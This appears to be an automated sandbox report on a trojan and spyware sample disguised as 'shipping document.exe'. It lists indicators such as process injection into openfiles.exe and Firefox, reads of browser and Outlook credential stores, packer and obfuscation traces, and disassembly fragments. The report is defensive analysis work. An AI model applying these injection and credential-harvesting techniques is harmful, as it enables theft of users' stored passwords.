              Source: 0.2.shipping document.exe.5ad0000.5.raw.unpack, V4uC3Iifq56IKQcfry.csCryptographic APIs: 'CreateDecryptor'
              Source: 0.2.shipping document.exe.a640000.7.raw.unpack, GyxdDdUhXZvol2uJqL.csSecurity API names: _0020.SetAccessControl
              Source: 0.2.shipping document.exe.a640000.7.raw.unpack, GyxdDdUhXZvol2uJqL.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.shipping document.exe.a640000.7.raw.unpack, GyxdDdUhXZvol2uJqL.csSecurity API names: _0020.AddAccessRule
              Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, YDmVa3b2SMMfc8PDHv.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, GyxdDdUhXZvol2uJqL.csSecurity API names: _0020.SetAccessControl
              Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, GyxdDdUhXZvol2uJqL.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, GyxdDdUhXZvol2uJqL.csSecurity API names: _0020.AddAccessRule
              Source: 0.2.shipping document.exe.a640000.7.raw.unpack, YDmVa3b2SMMfc8PDHv.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.shipping document.exe.357f9d0.1.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
              Source: 0.2.shipping document.exe.5c30000.6.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
              Source: 0.2.shipping document.exe.359004c.0.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@16/11
              Source: C:\Users\user\Desktop\shipping document.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\shipping document.exe.logJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeMutant created: NULL
              Source: C:\Windows\SysWOW64\openfiles.exeFile created: C:\Users\user\AppData\Local\Temp\03F67l1929Jump to behavior
              Source: shipping document.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: shipping document.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
              Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: openfiles.exe, 00000007.00000003.2210074668.0000000002B56000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000007.00000002.4110059356.0000000002B34000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000007.00000002.4110059356.0000000002B56000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: shipping document.exeReversingLabs: Detection: 23%
              Source: shipping document.exeVirustotal: Detection: 35%
              Source: unknownProcess created: C:\Users\user\Desktop\shipping document.exe "C:\Users\user\Desktop\shipping document.exe"
              Source: C:\Users\user\Desktop\shipping document.exeProcess created: C:\Users\user\Desktop\shipping document.exe "C:\Users\user\Desktop\shipping document.exe"
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeProcess created: C:\Windows\SysWOW64\openfiles.exe "C:\Windows\SysWOW64\openfiles.exe"
              Source: C:\Windows\SysWOW64\openfiles.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Users\user\Desktop\shipping document.exeProcess created: C:\Users\user\Desktop\shipping document.exe "C:\Users\user\Desktop\shipping document.exe"Jump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeProcess created: C:\Windows\SysWOW64\openfiles.exe "C:\Windows\SysWOW64\openfiles.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: framedynos.dllJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: winsqlite3.dllJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
              Source: shipping document.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: shipping document.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: OpnFiles.pdb source: shipping document.exe, 00000002.00000002.2033082089.00000000011D8000.00000004.00000020.00020000.00000000.sdmp, oWRaEnEJAq.exe, 00000006.00000002.4110369739.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, oWRaEnEJAq.exe, 00000006.00000003.1965995700.00000000014EC000.00000004.00000001.00020000.00000000.sdmp, oWRaEnEJAq.exe, 00000006.00000002.4110369739.00000000014D8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: oWRaEnEJAq.exe, 00000006.00000002.4109844179.0000000000B7E000.00000002.00000001.01000000.0000000C.sdmp, oWRaEnEJAq.exe, 00000008.00000000.2100219438.0000000000B7E000.00000002.00000001.01000000.0000000C.sdmp
              Source: Binary string: wntdll.pdbUGP source: shipping document.exe, 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000007.00000003.2033163379.0000000004507000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000007.00000003.2035061028.00000000046BE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: shipping document.exe, shipping document.exe, 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, openfiles.exe, 00000007.00000002.4111044686.0000000004870000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000007.00000003.2033163379.0000000004507000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000007.00000002.4111044686.0000000004A0E000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000007.00000003.2035061028.00000000046BE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: OpnFiles.pdbGCTL source: shipping document.exe, 00000002.00000002.2033082089.00000000011D8000.00000004.00000020.00020000.00000000.sdmp, oWRaEnEJAq.exe, 00000006.00000002.4110369739.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, oWRaEnEJAq.exe, 00000006.00000003.1965995700.00000000014EC000.00000004.00000001.00020000.00000000.sdmp, oWRaEnEJAq.exe, 00000006.00000002.4110369739.00000000014D8000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              .NET source code contains method to dynamically call methods (often used by packers)
              Source: 0.2.shipping document.exe.43a9970.2.raw.unpack, V4uC3Iifq56IKQcfry.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 0.2.shipping document.exe.5ad0000.5.raw.unpack, V4uC3Iifq56IKQcfry.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              .NET source code contains potential unpacker
              Source: shipping document.exe, OptionsForm.cs.Net Code: InitializeComponent
              Source: 0.2.shipping document.exe.a640000.7.raw.unpack, GyxdDdUhXZvol2uJqL.cs.Net Code: XDAt7X96fy System.Reflection.Assembly.Load(byte[])
              Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, GyxdDdUhXZvol2uJqL.cs.Net Code: XDAt7X96fy System.Reflection.Assembly.Load(byte[])
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 0_2_0315DB84 pushfd ; ret 0_2_0315DB89
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 0_2_07C53E3A push ds; ret 0_2_07C53E3B
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_00401873 pushad ; iretd 2_2_00401874
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0041E88B push 78FC4EB7h; retf 2_2_0041E89B
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0040BCDD push edi; ret 2_2_0040BCDE
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_004014A7 push cs; iretd 2_2_00401525
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_004014B0 push cs; iretd 2_2_00401525
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_004035C0 push eax; ret 2_2_004035C2
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0040A5FC push di; iretd 2_2_0040A604
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_00418656 push ecx; ret 2_2_00418657
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0173225F pushad ; ret 2_2_017327F9
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017327FA pushad ; ret 2_2_017327F9
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_017609AD push ecx; mov dword ptr [esp], ecx2_2_017609B6
              Source: C:\Users\user\Desktop\shipping document.exeCode function: 2_2_0173283D push eax; iretd 2_2_01732858
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeCode function: 6_2_03B25BF3 push esp; iretd 6_2_03B25C1E
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeCode function: 6_2_03B1EAA1 push 78FC4EB7h; retf 6_2_03B1EAB1
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeCode function: 6_2_03B0A818 push di; iretd 6_2_03B0A81A
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeCode function: 6_2_03B1886C push ecx; ret 6_2_03B1886D
              Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exeCode function: 6_2_03B0BEF3 push edi; ret 6_2_03B0BEF4
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048727FA pushad ; ret 7_2_048727F9
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0487225F pushad ; ret 7_2_048727F9
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0487283D push eax; iretd 7_2_04872858
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_048A09AD push ecx; mov dword ptr [esp], ecx7_2_048A09B6
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0279871A push edi; ret 7_2_0279871B
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_027AB2C8 push 78FC4EB7h; retf 7_2_027AB2D8
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0279703F push di; iretd 7_2_02797041
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_027A5093 push ecx; ret 7_2_027A5094
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_027A5115 push esp; retf D771h7_2_027A50E1
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_027A7AF5 push esp; ret 7_2_027A7AF6
              Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_027A7C90 push edx; ret 7_2_027A7C96
              Source: shipping document.exeStatic PE information: section name: .text entropy: 7.9656292226257115
              Source: 0.2.shipping document.exe.a640000.7.raw.unpack, LPvi3oP3RIhwgOcdmE.csHigh entropy of concatenated method names: 'jOJjZbJoMs', 'XPKjBdh8Yt', 'ToString', 'eCBjX6LUgQ', 'zJsjuEeDu0', 'mysjMkZL3O', 'l9KjNg4rGE', 'DPMj2ln57p', 'cT4jCKmgun', 'INyjrZHADc'
              Source: 0.2.shipping document.exe.a640000.7.raw.unpack, y5Qi5ClcJClfyxEEUt.csHigh entropy of concatenated method names: 'qvg7wG16T', 'vD4PNX64K', 'ld4U4WvOh', 'ASb4I1Vhd', 'jFQYsDsuG', 'T7hHVx31q', 'o7QI4WL4Ox7aptVets', 'jMYNL8pXTmOW9Z3Nq8', 'DCGifCvGD', 'WYIG3xnnS'
              Source: 0.2.shipping document.exe.a640000.7.raw.unpack, DP3hNizluiilH0Kbtj.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wS10xJy5Sa', 'Ij10OR4JJT', 'iOw0vKYQwK', 'j1I0jUTYSm', 'v3L0i3xUUE', 'n7D00ZYxQn', 'G1I0Gl2iRh'
              Source: 0.2.shipping document.exe.a640000.7.raw.unpack, GAKx9mnM0VBWIobfpZ.csHigh entropy of concatenated method names: 'bS8iXPs3qm', 'FM1iuRxWgR', 'grMiMukUTq', 'ffxiN67Ris', 'nP8i25rk9G', 'HaSiCnTSi6', 'SUnirydR3d', 'p0Qi8N9yk0', 'zkTiZ2BZug', 'GJgiBoOMyu'
              Source: 0.2.shipping document.exe.a640000.7.raw.unpack, Do078usZjI0jdkJhZb.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'c6Rh9tX3l0', 'b4Kha4ToaO', 'yF8hzhZc6x', 'cfWLw0yx5D', 'SJBLsRXNof', 'MiELhBiLCh', 'S7yLL0AKw9', 'PKqcS62uwcRc4IYrumL'
              Source: 0.2.shipping document.exe.a640000.7.raw.unpack, xOtm9kyFM4kmikJTQP.csHigh entropy of concatenated method names: 'xx3sCVJP7Y', 'RDlsr5xvlp', 'C3bsZtuEe1', 'AaVsBoIT90', 'qnRsOAQCIp', 'IaxsvVTG6a', 'xPvhg2mJs6jKLlXy7g', 'hn3th4NRDsHrtJ1RXu', 'wwun4Z1QVekaIeSgM0', 'R20ssyNNSI'
              Source: 0.2.shipping document.exe.a640000.7.raw.unpack, GyxdDdUhXZvol2uJqL.csHigh entropy of concatenated method names: 'KNALTLU5re', 'LMOLXAQHwl', 'wt2LuHNApy', 'HqFLMhGCR7', 'eo0LNRVT6g', 'KrgL2l05xl', 'sHFLCKwntW', 'k0FLr2TVx6', 'RccL8yTZBh', 'EHjLZOYIEH'
              Source: 0.2.shipping document.exe.a640000.7.raw.unpack, hrjkNWo5sorSlwedoL.csHigh entropy of concatenated method names: 'CESCD2KnPA', 'LjEC6dUa1Y', 'zBrC7GGIdx', 'X91CPpb3ij', 'Xn9CfcgkQ6', 'BNuCUItcti', 'IBKC4aQbGu', 'KWuCdT9YJT', 'F0qCYWCLAC', 'INwCHI9AIV'
              Source: 0.2.shipping document.exe.a640000.7.raw.unpack, iKb0caErrx0OaEK35J.csHigh entropy of concatenated method names: 'HxS2TNnegw', 'yY42uF3Z38', 'kTM2NlIlZO', 'FPd2CXNcWn', 'pRU2rlECKD', 'IMANoSQ27h', 'f4GNE8hoSk', 'm77NFa1WhS', 'XmeNqPa5GL', 'vGSN9gF23W'
              Source: 0.2.shipping document.exe.a640000.7.raw.unpack, skp1uwharrgpfQKevg.csHigh entropy of concatenated method names: 'EsrMPu912D', 'nl9MU61B63', 'MgoMdrSQHy', 'FWoMY9VF7M', 'ceQMOpPFxR', 'GJ4MvaGFZp', 'YNQMjbiLsx', 'TBZMiKcvGF', 'hf7M0dqMqB', 'qLhMGHXZ1b'
              Source: 0.2.shipping document.exe.a640000.7.raw.unpack, YDmVa3b2SMMfc8PDHv.csHigh entropy of concatenated method names: 'gYBuJN9rEx', 'Hbuu3NCpke', 'qFNuAIN9dZ', 'mYWueL9Vfb', 'hwluoBxrs3', 'NjwuE1xRmI', 'eYVuFyvpfo', 'Q7Juq2DQQ7', 'AC9u9DJTcr', 'DDNuahU9H3'
              Source: 0.2.shipping document.exe.a640000.7.raw.unpack, omX1sAmpb7YlgoyEOa.csHigh entropy of concatenated method names: 'lf9jqTj4FA', 'Kyfjabxrm9', 'Kveiw95qT7', 'vbSisxBjrh', 't05jbioFSF', 'CJGjIqPfcn', 'alxjWZrc3c', 'vHYjJs4Gnc', 'WhHj3LZ7oE', 'INljAcxIOk'
              Source: 0.2.shipping document.exe.a640000.7.raw.unpack, QFbnZv5nUopkM31AEm.csHigh entropy of concatenated method names: 'zum0si84un', 'xNV0LbWBrA', 'Hwb0tM3qsV', 'bqZ0X7R5Rl', 'FLV0uWem5H', 'z9M0NQQ6It', 'BUf02pAQGf', 'CxSiFXhlhx', 'FyRiqrYqVF', 'p3ji9UZjtB'
              Source: 0.2.shipping document.exe.a640000.7.raw.unpack, L80iZtF00YB24EpXgL.csHigh entropy of concatenated method names: 'wW5xdRCfZx', 'Xg6xYnFlJE', 'Oh6x1W6C4f', 'MA8xS5GL5o', 'PFfxRDdMLU', 'DXKx57J8QE', 'wkJxpYN0qt', 'm5nxKbe9O9', 'zTTxQP8Tve', 'HLexbOvGlN'
              Source: 0.2.shipping document.exe.a640000.7.raw.unpack, ejoofSV7fnSjUw2fi6.csHigh entropy of concatenated method names: 'Re1CXD0QXu', 'WTNCM9Oof7', 'uq4C2hukhw', 'tsm2aStNq9', 'L4n2z51Cp5', 'IVOCwcmiYQ', 'kqJCsBO9YC', 'welChY4ljj', 'KJPCLsZbxs', 'nIbCtIyaEj'
              Source: 0.2.shipping document.exe.a640000.7.raw.unpack, xMm9lx8h3995ywK4BF.csHigh entropy of concatenated method names: 'Dispose', 'Ua2s9FEIGV', 'fMlhS5qrWP', 'x0GVVJ6G8Y', 'ThqsaY4Pjv', 'm87szn8ZJu', 'ProcessDialogKey', 'I50hwR3cvu', 'SJBhsi6qx2', 'oj4hhRxXwi'
              Source: 0.2.shipping document.exe.a640000.7.raw.unpack, iG14yNa7nO8cosR7XGL.csHigh entropy of concatenated method names: 'tPB0DlTMiG', 'lW106Lp4FB', 'Aon074uARG', 'D8m0PtWLCV', 'zut0faXsrg', 'Nri0UPs5D2', 'mTo04mg48b', 'LD40dqnuZc', 'uZQ0YpuL9A', 'N7j0HK1nwB'
              Source: 0.2.shipping document.exe.43a9970.2.raw.unpack, V4uC3Iifq56IKQcfry.csHigh entropy of concatenated method names: 'JcqLcnHE8kRk7VHJhl', 'baAwnpSkPWAs4YMGxr', 'wTgrto4LNQ', 'imnL6GCB6AIFRqkhxN', 'RgtTUJcyZL', 'dHYrbjNADO', 'xiCr8b7Qs6', 'PT2rZj37UR', 'P1WruDgOtu', 'd71eKLY6YVFQv'
              Source: 0.2.shipping document.exe.43a9970.2.raw.unpack, vpednoN8EZgsJ4TDwx.csHigh entropy of concatenated method names: 'SvRTLtpnA', 'uJwWpedno', 'REZpgsJ4T', 'uwxys3A5Q', 'Tl3iTkB7U', 'EqRFtDP16', 'TW5lfqidm', 'wSKAUGlNW', 'LkrevaXpK', 'cwu0Op5AT'
              Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, LPvi3oP3RIhwgOcdmE.csHigh entropy of concatenated method names: 'jOJjZbJoMs', 'XPKjBdh8Yt', 'ToString', 'eCBjX6LUgQ', 'zJsjuEeDu0', 'mysjMkZL3O', 'l9KjNg4rGE', 'DPMj2ln57p', 'cT4jCKmgun', 'INyjrZHADc'
              Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, y5Qi5ClcJClfyxEEUt.csHigh entropy of concatenated method names: 'qvg7wG16T', 'vD4PNX64K', 'ld4U4WvOh', 'ASb4I1Vhd', 'jFQYsDsuG', 'T7hHVx31q', 'o7QI4WL4Ox7aptVets', 'jMYNL8pXTmOW9Z3Nq8', 'DCGifCvGD', 'WYIG3xnnS'
              Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, DP3hNizluiilH0Kbtj.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wS10xJy5Sa', 'Ij10OR4JJT', 'iOw0vKYQwK', 'j1I0jUTYSm', 'v3L0i3xUUE', 'n7D00ZYxQn', 'G1I0Gl2iRh'
              Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, GAKx9mnM0VBWIobfpZ.csHigh entropy of concatenated method names: 'bS8iXPs3qm', 'FM1iuRxWgR', 'grMiMukUTq', 'ffxiN67Ris', 'nP8i25rk9G', 'HaSiCnTSi6', 'SUnirydR3d', 'p0Qi8N9yk0', 'zkTiZ2BZug', 'GJgiBoOMyu'
              Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, Do078usZjI0jdkJhZb.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'c6Rh9tX3l0', 'b4Kha4ToaO', 'yF8hzhZc6x', 'cfWLw0yx5D', 'SJBLsRXNof', 'MiELhBiLCh', 'S7yLL0AKw9', 'PKqcS62uwcRc4IYrumL'
              Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, xOtm9kyFM4kmikJTQP.csHigh entropy of concatenated method names: 'xx3sCVJP7Y', 'RDlsr5xvlp', 'C3bsZtuEe1', 'AaVsBoIT90', 'qnRsOAQCIp', 'IaxsvVTG6a', 'xPvhg2mJs6jKLlXy7g', 'hn3th4NRDsHrtJ1RXu', 'wwun4Z1QVekaIeSgM0', 'R20ssyNNSI'
              Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, GyxdDdUhXZvol2uJqL.csHigh entropy of concatenated method names: 'KNALTLU5re', 'LMOLXAQHwl', 'wt2LuHNApy', 'HqFLMhGCR7', 'eo0LNRVT6g', 'KrgL2l05xl', 'sHFLCKwntW', 'k0FLr2TVx6', 'RccL8yTZBh', 'EHjLZOYIEH'
              Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, hrjkNWo5sorSlwedoL.csHigh entropy of concatenated method names: 'CESCD2KnPA', 'LjEC6dUa1Y', 'zBrC7GGIdx', 'X91CPpb3ij', 'Xn9CfcgkQ6', 'BNuCUItcti', 'IBKC4aQbGu', 'KWuCdT9YJT', 'F0qCYWCLAC', 'INwCHI9AIV'
              Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, iKb0caErrx0OaEK35J.csHigh entropy of concatenated method names: 'HxS2TNnegw', 'yY42uF3Z38', 'kTM2NlIlZO', 'FPd2CXNcWn', 'pRU2rlECKD', 'IMANoSQ27h', 'f4GNE8hoSk', 'm77NFa1WhS', 'XmeNqPa5GL', 'vGSN9gF23W'
              Source: 0.2.shipping document.exe.503ec90.4.raw.unpack, skp1uwharrgpfQKevg.csHigh entropy of concatenated method names: 'EsrMPu912D', 'nl9MU61B63', 'MgoMdrSQHy', 'FWoMY9VF7M', 'ceQMOpPFxR', 'GJ4MvaGFZp', 'YNQMjbiLsx', 'TBZMiKcvGF', 'hf7M0dqMqB', 'qLhMGHXZ1b'
